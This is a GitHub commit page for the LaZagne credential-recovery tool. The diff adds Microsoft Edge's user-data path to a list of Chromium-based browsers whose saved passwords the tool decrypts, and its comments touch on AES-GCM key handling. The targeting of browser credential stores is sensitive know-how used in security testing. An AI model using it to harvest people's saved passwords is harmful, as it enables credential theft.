Skip to content

Commit

Permalink
Merge pull request AlessandroZ#530 from hegerdes/master
Browse files Browse the repository at this point in the history
Added chromiumEdge support for windows
  • Loading branch information
AlessandroZ authored Sep 11, 2020
2 parents 32e181f + 837c313 commit 476e780
Showing 1 changed file with 4 additions and 3 deletions.
7 changes: 4 additions & 3 deletions Windows/lazagne/softwares/browsers/chromium_based.py
Original file line number Diff line number Diff line change
Expand Up @@ -134,9 +134,9 @@ def _export_credentials(self, db_path, is_yandex=False, master_key=None):
# Passwords are stored using AES-256-GCM algorithm
# The key used to encrypt is stored on the credential manager

# yandex_enckey:
# - 4 bytes should be removed to be 256 bits
# - these 4 bytes correspond to the nonce ?
# yandex_enckey:
# - 4 bytes should be removed to be 256 bits
# - these 4 bytes correspond to the nonce ?

# cipher = AES.new(yandex_enckey, AES.MODE_GCM)
# plaintext = cipher.decrypt(password)
Expand Down Expand Up @@ -230,6 +230,7 @@ def run(self):
(u'chedot', u'{LOCALAPPDATA}\\Chedot\\User Data'),
(u'chrome canary', u'{LOCALAPPDATA}\\Google\\Chrome SxS\\User Data'),
(u'chromium', u'{LOCALAPPDATA}\\Chromium\\User Data'),
(u'chromium edge', u'{LOCALAPPDATA}\\Microsoft\\Edge\\User Data'),
(u'coccoc', u'{LOCALAPPDATA}\\CocCoc\\Browser\\User Data'),
(u'comodo dragon', u'{LOCALAPPDATA}\\Comodo\\Dragon\\User Data'), # Comodo IceDragon is Firefox-based
(u'elements browser', u'{LOCALAPPDATA}\\Elements Browser\\User Data'),
Expand Down

0 comments on commit 476e780

Please sign in to comment.